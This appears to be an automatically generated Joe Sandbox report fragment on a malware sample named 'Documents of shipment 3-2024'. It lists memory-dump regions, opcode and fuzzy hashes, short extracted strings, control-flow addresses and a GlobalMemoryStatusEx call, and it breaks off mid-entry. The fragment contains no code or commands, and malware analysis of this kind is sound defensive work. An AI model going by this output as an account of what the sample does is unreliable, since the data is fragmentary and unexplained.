                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V"m$\V"m
                                              • API String ID: 0-1148475557
                                              • Opcode ID: 8c23a1d2d6f96c747288188c13733668b1a2dfd46a899cc4347fa24899337437
                                              • Instruction ID: 37d5d51a49e56b4ad4828a04b72882075f75a806faaf74596c41f7f91002895b
                                              • Opcode Fuzzy Hash: 8c23a1d2d6f96c747288188c13733668b1a2dfd46a899cc4347fa24899337437
                                              • Instruction Fuzzy Hash: 49715AB0E00249CFDB20CFADC9857AEBBF2BF48314F148529E415AB654EB749842CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2489 15d6f06-15d6f07 2490 15d6f0a-15d6f11 2489->2490 2491 15d6f84-15d6f8c 2490->2491 2492 15d6f13-15d6f42 2490->2492 2493 15d6f8e-15d6f91 2491->2493 2516 15d6f5e-15d6f6c 2492->2516 2517 15d6f44-15d6f5d call 15d6384 2492->2517 2494 15d6fa1-15d6fa4 2493->2494 2495 15d6f93 call 15d790a 2493->2495 2497 15d6fb8-15d6fbb 2494->2497 2498 15d6fa6-15d6fad 2494->2498 2499 15d6f99-15d6f9c 2495->2499 2503 15d6fbd-15d6fd1 2497->2503 2504 15d6fee-15d6ff1 2497->2504 2501 15d70eb-15d70f1 2498->2501 2502 15d6fb3 2498->2502 2499->2494 2502->2497 2511 15d6fd7 2503->2511 2512 15d6fd3-15d6fd5 2503->2512 2505 15d702d-15d702f 2504->2505 2506 15d6ff3-15d7028 2504->2506 2508 15d7036-15d7039 2505->2508 2509 15d7031 2505->2509 2506->2505 2508->2493 2513 15d703f-15d704e 2508->2513 2509->2508 2514 15d6fda-15d6fe9 2511->2514 2512->2514 2521 15d7078-15d708d 2513->2521 2522 15d7050-15d7053 2513->2522 2514->2504 2527 15d6eff 2516->2527 2528 15d6f6e-15d6f83 2516->2528 2521->2501 2526 15d705b-15d7076 2522->2526 2526->2521 2526->2522 2529 15d6ee9-15d6ef6 2527->2529 2530 15d6f00-15d6f05 call 15d6c40 2527->2530 2528->2491 2529->2527 2530->2489
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq$LRq
                                              • API String ID: 0-3710822783
                                              • Opcode ID: 591380c74278f1c2a0ffd84feabc2b2dcd181584f23a73f8c844fc42cd45af43
                                              • Instruction ID: 10a1ed95dbfc190cc505bd38dfa4801803e28598ddb464b7abd894c71f1c8ac5
                                              • Opcode Fuzzy Hash: 591380c74278f1c2a0ffd84feabc2b2dcd181584f23a73f8c844fc42cd45af43
                                              • Instruction Fuzzy Hash: F851CF71A002169FDB25DF6CC85079EBBB2FF89300F5085AAE415EB395DB719C42CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3022 66de270-66de2b6 3023 66de2be-66de2ec GlobalMemoryStatusEx 3022->3023 3024 66de2ee-66de2f4 3023->3024 3025 66de2f5-66de31d 3023->3025 3024->3025
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(8B5505CC), ref: 066DE2DF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2493702355.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_66d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: c97f9823f2577537f51f01bce638bdf967f3fc4978f5be9a001076bc9b6ac7e6
                                              • Instruction ID: 4b0abf3a96aac2b82f50d44815c24f7fe67445ca71c27996e4e2790b1d2d9912
                                              • Opcode Fuzzy Hash: c97f9823f2577537f51f01bce638bdf967f3fc4978f5be9a001076bc9b6ac7e6
                                              • Instruction Fuzzy Hash: 9A1156B1C0425A9FCB10CF9AC444BEEFBF5BF48324F14812AD818A7240D378A940CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(8B5505CC), ref: 066DE2DF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2493702355.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_66d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: e4d38466a317f79f0f00110642086622845521b2378410896dab9b572e2c674b
                                              • Instruction ID: 23941df9b59d5139d430049d821c6753aed83651db6553f990a8bfef21b2a5ef
                                              • Opcode Fuzzy Hash: e4d38466a317f79f0f00110642086622845521b2378410896dab9b572e2c674b
                                              • Instruction Fuzzy Hash: 1D11F3B1C0466A9FDB10DF9AC544BEEFBF4AF48324F14816AD818A7240D778A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V"m
                                              • API String ID: 0-1545561793
                                              • Opcode ID: b636b1b9d75003a66f27c226642a7b46d5e0180a6bccb7e9b732dc54d62c6475
                                              • Instruction ID: 48d93349ea08e968c01f4f291cfa3703e4835e6fdebffe6812f8a3c17d64b8da
                                              • Opcode Fuzzy Hash: b636b1b9d75003a66f27c226642a7b46d5e0180a6bccb7e9b732dc54d62c6475
                                              • Instruction Fuzzy Hash: C4915C70E0024ACFDB20CFACD9857DEBBF2BF48314F148529E455AB294DB749845CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHq
                                              • API String ID: 0-3820536768
                                              • Opcode ID: d1d1f7650ce86e5919a81660f51d48a7fc4a143614678099f01cded9d0b2a1d1
                                              • Instruction ID: 6dff08953542baedf02f92b926057e708b62bd89759ab586df12b17450af3f6e
                                              • Opcode Fuzzy Hash: d1d1f7650ce86e5919a81660f51d48a7fc4a143614678099f01cded9d0b2a1d1
                                              • Instruction Fuzzy Hash: 1E31EE717002018FDB2A9F38E55476E3BA2BB85700F64492AD007DB396DE75CC46CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHq
                                              • API String ID: 0-3820536768
                                              • Opcode ID: d29ddc56666eff304e832f857143d11a8dd61506beaaabe463999a1f4713ae88
                                              • Instruction ID: 0f65d380b3b4c09566229a692f6d67bd4987b3fcfce02d8556c4145d4a2afd5c
                                              • Opcode Fuzzy Hash: d29ddc56666eff304e832f857143d11a8dd61506beaaabe463999a1f4713ae88
                                              • Instruction Fuzzy Hash: C331CD70B002058FEB299F3CE41476E7BE2BB89A04F64452AD007DB3A5DE76DC46C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq
                                              • API String ID: 0-3187445251
                                              • Opcode ID: 9dc4efb0cc15e77bc0d0be96f0dda875a031548579b858cfc41e1f51e760e693
                                              • Instruction ID: 1ed069f7d2577dc88e8659faa3e89f4ff332996300652b9f25f42d4c28b771a1
                                              • Opcode Fuzzy Hash: 9dc4efb0cc15e77bc0d0be96f0dda875a031548579b858cfc41e1f51e760e693
                                              • Instruction Fuzzy Hash: 5F318E34E002198BDB25CF6CC45079EB7B1FF89305F50856AE811EB380EB71A942CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq
                                              • API String ID: 0-3187445251
                                              • Opcode ID: bbc85ba4b811fb63c86bd7a2f17a19833c267616f4282ac1d2d4bc3592a5e36e
                                              • Instruction ID: db2e5f988607ad6a04574f51fc3539f8ef6b3e05d263e7c2e290e874f7084ce1
                                              • Opcode Fuzzy Hash: bbc85ba4b811fb63c86bd7a2f17a19833c267616f4282ac1d2d4bc3592a5e36e
                                              • Instruction Fuzzy Hash: AB2188B27042528FD319AB38D85079E3BB2FB95740F4484AAC000CB396EE258C46CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3114e58b8074c4c2913e483e29bb3b77f4aaa01bc69d4218bf706c2902ab47f
                                              • Instruction ID: 34f48b6d3672b9005361079675f0b6612569737dd8bd54e664044cedb24e7eca
                                              • Opcode Fuzzy Hash: f3114e58b8074c4c2913e483e29bb3b77f4aaa01bc69d4218bf706c2902ab47f
                                              • Instruction Fuzzy Hash: 1F12A4707112068BEB2A9B3CD88422C77A6FBCA615F50597DE006CB365CE75DCC2CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efcb1ae5bf1d9ba5f3161d0a75b684e60bef0084c84219ebb9a07127ad63ddfa
                                              • Instruction ID: 096f0f1c03e66564f97b78870c99c0c4fc55581d8600b57dcb43c5861cfd452f
                                              • Opcode Fuzzy Hash: efcb1ae5bf1d9ba5f3161d0a75b684e60bef0084c84219ebb9a07127ad63ddfa
                                              • Instruction Fuzzy Hash: 13A14C70E00619CFEF20DFACD8857AEBBF1BF48314F148529D815AB694EB749885CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eed2a05cbce12fadd321d6b4bf1b22b6552f9bed52d6767db783f2d4e0afb55c
                                              • Instruction ID: 6b2c08206acca06b6e8f404b22c3687c7121176eacad284ff85d1e8c2c6397b9
                                              • Opcode Fuzzy Hash: eed2a05cbce12fadd321d6b4bf1b22b6552f9bed52d6767db783f2d4e0afb55c
                                              • Instruction Fuzzy Hash: 33915B74A002049FDB25DBA8D484AADBBF2FF88314F148569E906DB365DB35EC42CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15b5a616f19b4cfcd7f28f4c1977237fa37c3e0510b2dc5a53f0a99b4edaf5eb
                                              • Instruction ID: 93f537e415e17e6f3fcc88c7e324d9488ae9b3738da8dc51aa8fa135f13665db
                                              • Opcode Fuzzy Hash: 15b5a616f19b4cfcd7f28f4c1977237fa37c3e0510b2dc5a53f0a99b4edaf5eb
                                              • Instruction Fuzzy Hash: F2511275D002188FDB28DFADD884B9EBBB1FF48300F14852AD819BB355D774A885CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fb2e1076060b2d5bca75b2d7b510cdb5e7c7e8a7775a4f246ca81eecd7ca536
                                              • Instruction ID: 7c005abd9906de18ec505e370167bf4e3fab5fd0af4da6000f53dfeb3c0f8d15
                                              • Opcode Fuzzy Hash: 2fb2e1076060b2d5bca75b2d7b510cdb5e7c7e8a7775a4f246ca81eecd7ca536
                                              • Instruction Fuzzy Hash: 7C510371D002188FDB28DFADD884B9EBBB1FF48310F148529E815AB355D774A885CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 429d15c6bd48dda9e86d4471bb85a0a718cc6574657349273a9c7a00d04d3b42
                                              • Instruction ID: e6e776f042422e6fa97b31910bc0e1eb50fefc7a3ce0aa0502d399060a19bb21
                                              • Opcode Fuzzy Hash: 429d15c6bd48dda9e86d4471bb85a0a718cc6574657349273a9c7a00d04d3b42
                                              • Instruction Fuzzy Hash: 7F512774D113458FD719DB2EFA82A483B76EB5B30134481A8D4424B337EAB86CE5CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0d3d875758884e4082859e45c60f301b2faa0aeb36fb3616da58584cf161d10
                                              • Instruction ID: 29d33263ca985777ef716342fd062f9394c2b730522afc7e8a6b7656a2f1ce38
                                              • Opcode Fuzzy Hash: d0d3d875758884e4082859e45c60f301b2faa0aeb36fb3616da58584cf161d10
                                              • Instruction Fuzzy Hash: AE412834A00206CFDB25EB78D5546AD7BF1BF89245F2004A8D502AB3A1EB769C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3905b7d88f0c7654544d2bc9716f53a5b0f96d6e759ec55f0fbeeb0f12618282
                                              • Instruction ID: 42df60abb6b2123f9f5037569b1c5f83fff9c9695e7d800ed8eb95937df61b47
                                              • Opcode Fuzzy Hash: 3905b7d88f0c7654544d2bc9716f53a5b0f96d6e759ec55f0fbeeb0f12618282
                                              • Instruction Fuzzy Hash: D9510774D113458FD709DB2EFA82A483B76EB5B30134481A8D4424B337EAB86DE5CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 924ffb10067247cc0cf436c6923bce1693b30b39389c72f600b1895f97eed302
                                              • Instruction ID: c4c2ca51e67806eef804aed3d71b8ce9f5a16b1857bde2048f3d33081129a74e
                                              • Opcode Fuzzy Hash: 924ffb10067247cc0cf436c6923bce1693b30b39389c72f600b1895f97eed302
                                              • Instruction Fuzzy Hash: B2316175E102059BDB29CF69D89469EBBB2FF89300F50852AE806EB355DF71EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3ef09c09bfd655898b8737a444d434a0d5fa588138b16b2fbe16e1138a03edf
                                              • Instruction ID: 30863ff36bfab8c42fd77318618504623412310c4d65386c1235784a82e4d740
                                              • Opcode Fuzzy Hash: c3ef09c09bfd655898b8737a444d434a0d5fa588138b16b2fbe16e1138a03edf
                                              • Instruction Fuzzy Hash: 2B31BC71B046458FEB26DB7CD5957AD3BB1BF49205F1004A9D106EF3A2EB358C81CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83604156a9d87a95736856b95bf460810b70574161ac4a9ee86390d0dae2153f
                                              • Instruction ID: 0668ac2a000d34a07253385d74825fe8cfd39debbdeb2e960692dc4918c09d19
                                              • Opcode Fuzzy Hash: 83604156a9d87a95736856b95bf460810b70574161ac4a9ee86390d0dae2153f
                                              • Instruction Fuzzy Hash: D441E0B4D003489FEB24CFA9C984B9EBBF5BF48310F148429E809AB254DB759946CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c2b2e82e4fa9a3f63fd8e96884d7591c4b5929de848e588335e2dfd16ee86f7
                                              • Instruction ID: edecdbd559bddfba9a14643bbce76732e7f8f921bcc44611aba8cf1c1e7b1340
                                              • Opcode Fuzzy Hash: 6c2b2e82e4fa9a3f63fd8e96884d7591c4b5929de848e588335e2dfd16ee86f7
                                              • Instruction Fuzzy Hash: 7A314F74E102099BDB29CFA9D49469EBBB2FF89300F11851AE806EB355DF70EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8fecbd837401bda013838c98ba352f4b59c7f64ece2cb16623a21be5a6983bd
                                              • Instruction ID: e84516bdcdc1fa53da23725614969e8c3ad457596983ebb724b7d27b2c5fc1cf
                                              • Opcode Fuzzy Hash: e8fecbd837401bda013838c98ba352f4b59c7f64ece2cb16623a21be5a6983bd
                                              • Instruction Fuzzy Hash: 7541DFB0D00348DFDB24DFA9C584ADEBBF5FF48310F248429E819AB254DB75A946CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1cb56ffe21ec786b7493249bed91a8c343d3ede5629ec2586dd3247a44c38b9d
                                              • Instruction ID: 08f8b2e324ea9acded721db1f911766d1a83a8d61c2cc0b7bee576fbf67ad01d
                                              • Opcode Fuzzy Hash: 1cb56ffe21ec786b7493249bed91a8c343d3ede5629ec2586dd3247a44c38b9d
                                              • Instruction Fuzzy Hash: E1312B34B00619CFEB29EB7CC5546AD77F2BF8D245F1004A8D541AB3A4EB769C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79611416a2d1e1a9bb5c1cfed6b700cbc7d3f4719cee1625e6f5a5ba3057d390
                                              • Instruction ID: bd600b79f59da994b792c70c8393ba0b3ce55df718a1280e82b23570581b36ee
                                              • Opcode Fuzzy Hash: 79611416a2d1e1a9bb5c1cfed6b700cbc7d3f4719cee1625e6f5a5ba3057d390
                                              • Instruction Fuzzy Hash: 51317F71E102099BDB25CFADD88479EFBB2FF89304F148619E805AB255EB719841CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6ef089c2ca92351d8e0ed37f3192e8efa3dc7f4e7fb4848b41b089c1664b9c9
                                              • Instruction ID: 3b56e29360e593b1f258e3fc470566c21af9b60d47c01f2c378fd7985f45cbad
                                              • Opcode Fuzzy Hash: b6ef089c2ca92351d8e0ed37f3192e8efa3dc7f4e7fb4848b41b089c1664b9c9
                                              • Instruction Fuzzy Hash: 35214D70E102099BDB25CFADD48069EFBB2FF89304F548619E805AB255DB719885CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a68d2e16349b895d1600dc48ac749ad3323101dd9ad512574ee6ef668f50ce80
                                              • Instruction ID: b9ccd86f273ab89a05e6c201fb7860346fd87a2ac94da682e4852ce34b014dd7
                                              • Opcode Fuzzy Hash: a68d2e16349b895d1600dc48ac749ad3323101dd9ad512574ee6ef668f50ce80
                                              • Instruction Fuzzy Hash: 8821AF74A106044BEB25DB6DE88472D3B69FB46301F514A24E846CF267EA78DCC0CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b53c76b7f0a43ec704b8c2daaca8c4b310822a85bb59fd471758601bfa7134c9
                                              • Instruction ID: d77b8bf096bf5a8ed6b46df5fd990fe2afee89278d6621080c70ea40bca5bf1f
                                              • Opcode Fuzzy Hash: b53c76b7f0a43ec704b8c2daaca8c4b310822a85bb59fd471758601bfa7134c9
                                              • Instruction Fuzzy Hash: 8C218334E002098BDB19CFA8D44469EFBB2FF89304F10852AE815FB351DB71D945CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01ba8f97e00338bd8567edbf403ba45877771657b8f7b413c7696af7d41b2a3c
                                              • Instruction ID: 465924080bee1d2ab2372961530ca49f4402ffcee9c0d31950eddc0d5e69beab
                                              • Opcode Fuzzy Hash: 01ba8f97e00338bd8567edbf403ba45877771657b8f7b413c7696af7d41b2a3c
                                              • Instruction Fuzzy Hash: 8F21F374A00205CFDB24DFA9D558AAE7BF1FB89204B1044A8E506EB3A5EA769D40CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2485428578.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_145d000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55dcb2fd72f4eea7411e933e9d27130f9da5a69a4371cf86f8f57342680b726e
                                              • Instruction ID: 5b0b3ec3dd1b0480c4e036b2d0a6555e76018eb9d2febc4dc5e17569d8c02394
                                              • Opcode Fuzzy Hash: 55dcb2fd72f4eea7411e933e9d27130f9da5a69a4371cf86f8f57342680b726e
                                              • Instruction Fuzzy Hash: 192100B1A04200DFDB55DF54D880B26BBA1EF84618F24C56EDD0A4B367C33AD847CA62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d834055cf06f6581ff7354a0fe998321b0ba0e16cd4ead858970916d00679139
                                              • Instruction ID: 97fe43b36db642dfaa422d0bab6ae8f50cf5d804f4e2cb882cb6214878f3d4e2
                                              • Opcode Fuzzy Hash: d834055cf06f6581ff7354a0fe998321b0ba0e16cd4ead858970916d00679139
                                              • Instruction Fuzzy Hash: 45217CB4A046158BEB365B7DE4D532D3B61F702311F10096AE906CF292EE69CC85CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8686d22cef375dbd4de641bdc585b0e679397974f79339f6d398b1fd26195789
                                              • Instruction ID: 0a3926631ba27a2871676b216918eb0bb10929c72baceac774353ef1d688111c
                                              • Opcode Fuzzy Hash: 8686d22cef375dbd4de641bdc585b0e679397974f79339f6d398b1fd26195789
                                              • Instruction Fuzzy Hash: 8B216F72B101169FEB24DB6DC854BAE7BF6BF88714F148069E505EB3A4DAB1DC008B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
